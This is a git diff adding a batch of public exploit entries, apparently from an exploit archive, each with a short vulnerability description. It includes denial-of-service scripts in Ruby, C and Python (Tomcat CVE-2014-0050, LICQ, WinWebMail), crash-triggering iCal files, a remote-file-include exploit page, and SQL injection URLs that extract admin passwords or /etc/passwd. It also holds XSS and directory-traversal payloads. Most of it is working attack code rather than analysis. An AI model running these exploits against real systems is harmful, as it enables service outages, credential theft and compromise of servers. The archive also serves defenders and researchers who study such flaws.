+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Cookie[jtable%2376270709page-size=10]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[35]
+      Content-Type[text/html]
+      Date[Tue, 11 Feb 2014 23:14:46 GMT]
+
+
+
+
+1.3
+The file include vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below.
+
+PoC: 
+
+<div class="x-grid-row-checker"> </div></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1015   ">
+<div class="x-grid-cell-inner " style="text-align: left; ;"><div style="position:relative;top:3px">
+<img src="JoyfulPhone%C2%AE%20jDisk_file%20include_rename-Dateien/__FD__.txt" style="width:16px;height:16px;"><span style="position:absolute; padding-left: 5px; 
+padding-top:0px">>"<[LOCAL FILE INCLUDE VULNERABILITY!].txt">[LOCAL FILE INCLUDE VULNERABILITY!].jpg</span></div></div></td><td
+ class=" x-grid-cell x-grid-cell-gridcolumn-1016   " ><div  
+class="x-grid-cell-inner " style="text-align: left; 
+;">/</div></td><td class=" x-grid-cell 
+x-grid-cell-gridcolumn-1017   " ><div  class="x-grid-cell-inner " 
+style="text-align: right; ;">23.8 KB</div></td><td 
+class=" x-grid-cell x-grid-cell-gridcolumn-1018   " ><div  
+class="x-grid-cell-inner " style="text-align: left; ;">2014-02-12 
+00:13:49</div></td><td class=" x-grid-cell 
+x-grid-cell-gridcolumn-1019   x-grid-cell-last" ><div  
+class="x-grid-cell-inner " style="text-align: left; ;">2014-02-12 
+00:13:49</div></td></tr></tbody></table></iframe></span></div></div></td></tr></tbody></table></div>
+
+PoC: rename - text file
+
+<td style="width: 100%;" class="x-form-item-body " id="messagebox-1001-testfield-bodyEl" role="presentation" colspan="3">
+<input value=">"<[LOCAL FILE INCLUDE VULNERABILITY!]>[LOCAL FILE INCLUDE VULNERABILITY!].jpg" data-errorqtip="" aria-invalid="false" 
+id="messagebox-1001-testfield-inputEl" size="1" name="messagebox-1001-testfield-inputEl" style="width: 100%; -moz-user-select: 
+text;" class="x-form-field x-form-text x-form-focus x-field-form-focus x-field-default-form-focus" autocomplete="off" type="text"></td></tr></tbody></table>
+<table id="messagebox-1001-textarea" class="x-field x-form-item x-field-default x-anchor-form-item" style="height: 75px; table-layout: fixed; width: 520px; 
+display: none;" cellpadding="0"><tbody><tr id="messagebox-1001-textarea-inputRow"><td id="messagebox-1001-textarea-labelCell" style="display:none;" 
+halign="left" class="x-field-label-cell" valign="top" width="105"><label id="messagebox-1001-textarea-labelEl" for="messagebox-1001-textarea-inputEl" 
+class="x-form-item-label x-form-item-label-left" style="width:100px;margin-right:5px;"></label></td><td style="width: 100%;" class="x-form-item-body " 
+id="messagebox-1001-textarea-bodyEl" role="presentation" colspan="3"><textarea data-errorqtip="" aria-invalid="false" id="messagebox-1001-textarea-inputEl" 
+name="messagebox-1001-textarea-inputEl" rows="4" cols="20" class="x-form-field x-form-text" style="width: 100%; height: 75px; -moz-user-select: text;" 
+autocomplete="off">
+
+
+Security Risk:
+==============
+1.1
+The security risk of the remote code execution web vulnerabilities are estimated as critical.
+
+1.2
+The security risk of the directory traversal web vulnerabilities are estimated as high(-).
+
+1.3
+The security risk of the local file include web vulnerabilities are estimated as high(+).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/java/webapps/31621.txt b/platforms/java/webapps/31621.txt
new file mode 100755
index 000000000..a5e5442fa
--- /dev/null
+++ b/platforms/java/webapps/31621.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28649/info
+
+Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Sun Java System Messenger Express 6.1-13-15 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/en/mail.html?sid=<something>&lang="><script>alert(1);</script> 
\ No newline at end of file
diff --git a/platforms/multiple/dos/31615.rb b/platforms/multiple/dos/31615.rb
new file mode 100755
index 000000000..f07a09ea5
--- /dev/null
+++ b/platforms/multiple/dos/31615.rb
@@ -0,0 +1,109 @@
+#################################################################################
+# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service	#
+# 																				#
+# Author: Oren Hafif, Trustwave SpiderLabs Research								#
+# This is a Proof of Concept code that was created for the sole purpose 		#
+# of assisting system administrators in evaluating whether their applications 	#
+# are vulnerable to this issue or not											#
+#  																				#
+# Please use responsibly.														#
+#################################################################################
+
+
+require 'net/http'
+require 'net/https'
+require 'optparse'
+require 'openssl'
+
+
+options = {}
+
+opt_parser = OptionParser.new do |opt|
+  opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"
+  opt.separator  ""
+  opt.separator  "Options"
+  opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|
+    options[:url] = url
+  end
+
+  opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|
+    options[:number_of_requests] = number_of_requests
+  end
+
+  opt.on("-h","--help","help") do
+  	puts ""
+    puts "#################################################################################"
+	puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service   #"
+	puts "#                                                                               #"
+	puts "# Author: Oren Hafif, Trustwave SpiderLabs Research                             #"
+	puts "# This is a Proof of Concept code that was created for the sole purpose         #"
+	puts "# of assisting system administrators in evaluating whether or not               #"
+	puts "# their applications are vulnerable to this issue.                              #"
+	puts "#                                                                               #"
+	puts "# Please use responsibly.                                                       #"
+	puts "#################################################################################"
+    puts ""
+    puts opt_parser
+    puts ""
+  
+	exit
+  end
+end
+
+opt_parser.parse!
+
+
+uri = ""
+begin
+	uri = URI.parse(options[:url])
+rescue Exception => e
+	puts ""
+	puts "ERROR: Invalid URL was entered #{options[:url]}"
+	puts ""
+    puts opt_parser
+    exit
+end
+
+number_of_requests = 10;
+if(options[:number_of_requests] != nil)
+	begin
+		number_of_requests = Integer( options[:number_of_requests] )
+		throw Exception.new if number_of_requests <= 0 
+	rescue Exception => e
+		puts e
+		puts ""
+		puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"
+		puts ""
+	    puts opt_parser
+	    exit
+	end
+end
+
+#uri = URI.parse(uri)
+
+
+puts ""
+puts "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."
+i=10
+i.times { print "#{i.to_s}...";sleep 1; i-=1;}
+puts ""
+
+
+number_of_requests.times do 
+	begin
+	puts "Request Launched"
+	https = Net::HTTP.new(uri.host,uri.port)
+	https.use_ssl = uri.scheme=="https"
+	https.verify_mode = OpenSSL::SSL::VERIFY_NONE
+	req = Net::HTTP::Post.new(uri.path)
+	req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")
+	req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")
+	req.body = "b"*4097
+	https.read_timeout = 1 
+	res = https.request(req)
+	rescue Timeout::Error=>e
+		puts "Timeout - continuing DoS..."
+	rescue Exception=>e
+		puts e.inspect
+	end
+end
diff --git a/platforms/osx/dos/31619.ics b/platforms/osx/dos/31619.ics
new file mode 100755
index 000000000..cd13ce811
--- /dev/null
+++ b/platforms/osx/dos/31619.ics
@@ -0,0 +1,50 @@
+source: http://www.securityfocus.com/bid/28632/info
+
+Apple iCal is prone to a denial-of-service vulnerability because it fails to handle specially crafted files.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected.
+
+BEGIN:VCALENDAR
+X-WR-CALNAME:Fake event
+PRODID:-//Apple Inc.//iCal 3.0//EN
+CALSCALE:GREGORIAN
+VERSION:2.0
+METHOD:PUBLISH
+BEGIN:VTIMEZONE
+TZID:America/Buenos_Aires
+BEGIN:DAYLIGHT
+TZOFFSETFROM:-0300
+TZOFFSETTO:-0300
+DTSTART:19991003T000000
+RDATE:19991003T000000
+TZNAME:ARST
+END:DAYLIGHT
+BEGIN:STANDARD
+TZOFFSETFROM:-0300
+TZOFFSETTO:-0300
+DTSTART:20000303T000000
+RDATE:20000303T000000
+RDATE:20001231T210000
+TZNAME:ART
+END:STANDARD
+END:VTIMEZONE
+BEGIN:VEVENT
+SEQUENCE:10
+DTSTART;TZID=America/Buenos_Aires:20071225T000000
+DTSTAMP:20071213T124414Z
+SUMMARY:Fake Event
+DTEND;TZID=America/Buenos_Aires:20071225T010000
+RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
+UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
+TRANSP:OPAQUE
+CREATED:20071213T124215Z
+BEGIN:VALARM
+X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
+ACTION:DISPLAY
+DESCRIPTION:Event reminder
+TRIGGER:-PT65535H
+END:VALARM
+END:VEVENT
+END:VCALENDAR
diff --git a/platforms/osx/dos/31620.ics b/platforms/osx/dos/31620.ics
new file mode 100755
index 000000000..a7333edf2
--- /dev/null
+++ b/platforms/osx/dos/31620.ics
@@ -0,0 +1,68 @@
+source: http://www.securityfocus.com/bid/28633/info
+
+Apple iCal is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input data.
+
+Successful exploits will crash the application. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+iCal 3.0.1 is vulnerable; other versions may also be affected.
+
+/----------- 
+
+BEGIN:VCALENDAR
+X-WR-TIMEZONE:America/Buenos_Aires
+PRODID:-//Apple Inc.//iCal 3.0//EN
+CALSCALE:GREGORIAN
+X-WR-CALNAME:evento falso
+VERSION:2.0
+X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990
+METHOD:PUBLISH
+BEGIN:VTIMEZONE
+TZID:America/Buenos_Aires
+BEGIN:DAYLIGHT
+TZOFFSETFROM:-0300
+TZOFFSETTO:-0300
+DTSTART:19991003T000000
+RDATE:19991003T000000
+TZNAME:ARST
+END:DAYLIGHT
+BEGIN:STANDARD
+TZOFFSETFROM:-0300
+TZOFFSETTO:-0300
+DTSTART:20000303T000000
+RDATE:20000303T000000
+RDATE:20001231T210000
+TZNAME:ART
+END:STANDARD
+END:VTIMEZONE
+BEGIN:VEVENT
+SEQUENCE:11
+DTSTART;TZID=America/Buenos_Aires:20071225T000000
+DTSTAMP:20071213T143420Z
+SUMMARY:evento falso
+DTEND;TZID=America/Buenos_Aires:20071225T010000
+LOCATION:donde se hace
+RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
+TRANSP:OPAQUE
+UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
+URL;VALUE=URI:http://pepe.com:443/pepe
+ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2
+0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php
+CREATED:20071213T142720Z
+CREATED:20071213T124215Z
+BEGIN:VALARM
+X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
+ACTION:DISPLAY
+DESCRIPTION:Event reminder
+TRIGGER:-PT15H
+END:VALARM
+BEGIN:VALARM
+X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0
+ACTION:AUDIO
+TRIGGER:-PT15M
+ATTACH;VALUE=URI:S=osumi
+END:VALARM
+END:VEVENT
+END:VCALENDAR
+  
+-----------/
+
diff --git a/platforms/php/webapps/31616.txt b/platforms/php/webapps/31616.txt
new file mode 100755
index 000000000..12f051049
--- /dev/null
+++ b/platforms/php/webapps/31616.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28631/info
+
+Web Server Creator is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Web Server Creator 0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/Web_Server_Creator_path/news/include/createdb.php?langfile;=ZoRLu.txt? 
\ No newline at end of file
diff --git a/platforms/php/webapps/31622.txt b/platforms/php/webapps/31622.txt
new file mode 100755
index 000000000..e1a7b6807
--- /dev/null
+++ b/platforms/php/webapps/31622.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28650/info
+
+URLStreet is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+URLStreet 1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/URLStreet/seeurl.php?language="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/URLStreet/seeurl.php?language=a&pageno=1&filter=none&order="><script>alert("CANAKKALE-GECiLMEZ")</script>&search=aaa http://www.example.com/URLStreet/seeurl.php?language=a&pageno=1&filter="><script>alert("CANAKKALE-GECiLMEZ")</script>&order=hit&search=aaa 
\ No newline at end of file
diff --git a/platforms/php/webapps/31623.txt b/platforms/php/webapps/31623.txt
new file mode 100755
index 000000000..7d4f92dc8
--- /dev/null
+++ b/platforms/php/webapps/31623.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/28664/info
+
+Wikepage Opus is prone to multiple directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues using directory-traversal strings ('../') to download arbitrary files with the privileges of the webserver process. Information obtained may aid in further attacks.
+
+Wikepage Opus 13 2007.2 is affected; other versions may also be vulnerable.
+
+http://www.example.com/wikepage/index.php?wiki=template=../../../../../../../../boot.ini  
+http://www.example.com/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
+http://www.example.com/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini
+http://www.example.com/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
+http://www.example.com/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini
diff --git a/platforms/php/webapps/31625.txt b/platforms/php/webapps/31625.txt
new file mode 100755
index 000000000..3242dc20d
--- /dev/null
+++ b/platforms/php/webapps/31625.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28676/info
+
+Prozilla Gaming Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The issue affects Prozilla Gaming Directory 1.0; other versions may also be vulnerable. 
+
+http://www.example.com/directory.php?ax=list&sub=6&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2F6574632F706173737764),4/**/FROM/**/links/*
+
diff --git a/platforms/php/webapps/31626.txt b/platforms/php/webapps/31626.txt
new file mode 100755
index 000000000..f2a07100e
--- /dev/null
+++ b/platforms/php/webapps/31626.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28677/info
+
+
+Prozilla Software Index is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects Prozilla Software Index 1.1; other versions may also be vulnerable. 
+
+
+http://www.example.com/showcategory.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(0x3C666F6E7420636F6C6F723D22726564223E,admin_name,0x3a,pwd,0x3C2F666F6E743E),3,4,5/**/FROM/**/sbwmd_admin/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31628.txt b/platforms/php/webapps/31628.txt
new file mode 100755
index 000000000..1d542c756
--- /dev/null
+++ b/platforms/php/webapps/31628.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28680/info
+
+Swiki is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+Swiki 1.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com:8000/<script>alert("XSS");</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/31631.txt b/platforms/php/webapps/31631.txt
new file mode 100755
index 000000000..d29781e3d
--- /dev/null
+++ b/platforms/php/webapps/31631.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28701/info
+
+PU Arcade is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects PU Arcade 2.2; other versions may also be affected.
+
+http://www.example..com/Path/index.php?option=com_puarcade&Itemid=1&gid=0 UNION SELECTpassword,username,0,0,0 from jos_users-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/31633.html b/platforms/php/webapps/31633.html
new file mode 100755
index 000000000..63095f39d
--- /dev/null
+++ b/platforms/php/webapps/31633.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28708/info
+
+Fishing Cat Portal Addon for phpBB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title> <script language="JavaScript"> //'Bug found and Exploit coded by bd0rk //'Vendor: http://www.foxymods-phpbb.com/ //'Download: http://www.foxymods-phpbb.com/download.php?id=7 //'Contact: bd0rk[at]hackermail.com //'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx); //'$phpbb_root_path is not declared before include //'Greetings: str0ke, TheJT, rgod, Frauenarzt //#The german Hacker bd0rk var dir="/includes/" var file="/functions_portal.php?" var parameter ="phpbb_root_path=" var shell="Insert your shellcode here" function command() { if (document.rfi.target1.value==""){ alert("Exploit failed..."); return false; } rfi.action= document.rfi.target1.value+dir+file+parameter+shell; rfi.submit(); } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2">&nbsp;</font></b> <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p> </center> </body> </html> 
\ No newline at end of file
diff --git a/platforms/php/webapps/31636.txt b/platforms/php/webapps/31636.txt
new file mode 100755
index 000000000..ce63f1504
--- /dev/null
+++ b/platforms/php/webapps/31636.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28736/info
+
+W2B phpHotResources is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects unknown versions of phpHotResources; we will update this BID when more details become available.
+
+http://www.example.com/[path]/cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31637.txt b/platforms/php/webapps/31637.txt
new file mode 100755
index 000000000..001bef21b
--- /dev/null
+++ b/platforms/php/webapps/31637.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28737/info
+
+W2B Dating Club is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects unknown versions of Dating Club; we will update this BID when more details become available.
+
+http://www.example.com/[path]/browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body 
\ No newline at end of file
diff --git a/platforms/php/webapps/31639.txt b/platforms/php/webapps/31639.txt
new file mode 100755
index 000000000..27f7ffc1e
--- /dev/null
+++ b/platforms/php/webapps/31639.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28747/info
+
+Trillian is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+To exploit this issue, an attacker must entice an unsuspecting user to load a malicious '.dtd' file. Successfully exploiting this issue may allow remote attackers to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will cause denial-of-service conditions.
+
+Trillian 3.1.9.0 Basic is vulnerable; other versions may also be affected.
+
+http://www.p1mp4m.es/index.php?act=attach&type=post&id=18 
\ No newline at end of file
diff --git a/platforms/php/webapps/31640.txt b/platforms/php/webapps/31640.txt
new file mode 100755
index 000000000..513e1e215
--- /dev/null
+++ b/platforms/php/webapps/31640.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28752/info
+
+osCommerce Poll Booth is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Poll Booth v2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users 
\ No newline at end of file
diff --git a/platforms/unix/dos/31627.c b/platforms/unix/dos/31627.c
new file mode 100755
index 000000000..373a8de4f
--- /dev/null
+++ b/platforms/unix/dos/31627.c
@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/28679/info
+
+LICQ is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
+
+A remote attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute code, but this has not been confirmed. 
+
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+// change to suit your needs
+#define MAX 1024
+
+int fds[MAX];
+
+int main(int argc, char *argv[])
+{
+   int port,a;
+   char host[12];
+   struct sockaddr_in victim;
+   struct in_addr inp;
+
+   if (argc!=3)
+   {
+       printf("usage: %s <ip> <port>\n",argv[0]);
+       exit(1);
+   }
+
+   port=atoi(argv[2]);
+   strcpy(host,argv[1]);
+   printf("ip=%s\n",host);
+
+   for (a=1;a<=MAX;a++)
+   {
+       fds[a]=socket(PF_INET,SOCK_STREAM,0);
+       victim.sin_family= AF_INET;
+       victim.sin_port=htons(port);
+       inet_aton(host,&victim.sin_addr);
+       connect(fds[a],&victim,sizeof(victim));
+   }
+
+   printf("done!");
+
+}
+
diff --git a/platforms/unix/remote/31634.py b/platforms/unix/remote/31634.py
new file mode 100755
index 000000000..a42bd8b13
--- /dev/null
+++ b/platforms/unix/remote/31634.py
@@ -0,0 +1,71 @@
+source: http://www.securityfocus.com/bid/28715/info
+
+Python zlib module is prone to a remote buffer-overflow vulnerability because the library fails to properly sanitize user-supplied data.
+
+An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue affects Python 2.5.2; other versions may also be vulnerable. 
+
+python-2.5.2-zlib-unflush-misallocation.py
+------------------------------------------
+#!/usr/bin/python
+
+import zlib
+
+msg = """
+Desire to know why, and how, curiosity; such as is in no living creature
+        but man:
+so that man is distinguished, not only by his reason, but also by this
+        singular passion
+from other animals; in whom the appetite of food, and other pleasures of
+        sense, by
+predominance, take away the care of knowing causes; which is a lust of
+        the mind,
+that by a perseverance of delight in the continual and indefatigable
+generation of knowledge, exceedeth the short vehemence of any carnal
+        pleasure.
+"""
+
+compMsg = zlib.compress(msg)
+bad = -24
+decompObj = zlib.decompressobj()
+decompObj.decompress(compMsg)
+decompObj.flush(bad)
+
+	
+python-2.5.2-zlib-unflush-signedness.py:
+----------------------------------------
+#!/usr/bin/python
+
+import zlib
+
+msg = """
+Society in every state is a blessing, but government even in its best
+        state is but a necessary evil
+in its worst state an intolerable one; for when we suffer, or are
+        exposed to the same miseries by a
+government, which we might expect in a country without government, our
+        calamities is heightened by
+reflecting that we furnish the means by which we suffer! Government,
+        like dress, is the badge of
+lost innocence; the palaces of kings are built on the ruins of the
+        bowers of paradise. For were
+the impulses of conscience clear, uniform, and irresistibly obeyed, man
+        would need no other
+lawgiver; but that not being the case, he finds it necessary to
+        surrender up a part of his property
+to furnish means for the protection of the rest; and this he is induced
+        to do by the same prudence which
+in every other case advises him out of two evils to choose the least.
+        Wherefore, security being the true
+design and end of government, it unanswerably follows that whatever form
+        thereof appears most likely to
+ensure it to us, with the least expense and greatest benefit, is
+        preferable to all others.
+""" * 1024
+
+compMsg = zlib.compress(msg)
+bad = -2
+decompObj = zlib.decompressobj()
+decompObj.decompress(compMsg, 1)
+decompObj.flush(bad)
\ No newline at end of file
diff --git a/platforms/windows/dos/31635.py b/platforms/windows/dos/31635.py
new file mode 100755
index 000000000..e7c9c5ca3
--- /dev/null
+++ b/platforms/windows/dos/31635.py
@@ -0,0 +1,81 @@
+source: http://www.securityfocus.com/bid/28721/info
+
+
+WinWebMail is prone to a denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Remote attackers can exploit this issue to crash the server and deny service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
+
+WinWebMail 3.7.3.2 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+##########################################################################
+#
+# WinWebMail PREAUTH DoS POC 
+# Tested on version 3.7.3.2 on Windows XPSP2 English
+#
+# Bug discovered by Matteo Memelli aka ryujin
+# http://www.gray-world.net http://www.be4mind.com
+#
+# EAX 00000000
+# ECX 3FFFF690
+# EDX 41414141 <---
+# EBX FFFFFFFB
+# ESP 0AF3D7A8
+# EBP 00B1279C
+# ESI 0AF3DD68
+# EDI 0AF40000
+# EIP 0053AAD9 EMSVR.0053AAD9
+#
+##########################################################################
+#
+# bt # ./winwebmail_dos.py -H 192.168.1.3 -P 143
+# [+] Connecting to 192.168.1.3 on port 143
+# [+] Preparing for DoS...
+# * OK IMAP4 on WinWebMail [3.7.3.2] ready.  http://www.winwebmail.net
+#
+# [+] Evil buf sent!
+# [+] Let's wait 5 secs and see if the server crashed...
+# [+] Server Di3d:  Connection refused
+# [+] The attack was successful!
+#
+##########################################################################
+
+from socket import *
+from optparse import OptionParser
+import sys, time
+
+usage =  "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
+parser = OptionParser(usage=usage)
+parser.add_option("-H", "--target_host", type="string",
+                  action="store", dest="HOST",
+                  help="Target Host")
+parser.add_option("-P", "--target_port", type="int",
+                  action="store", dest="PORT",
+                  help="Target Port")
+(options, args) = parser.parse_args()
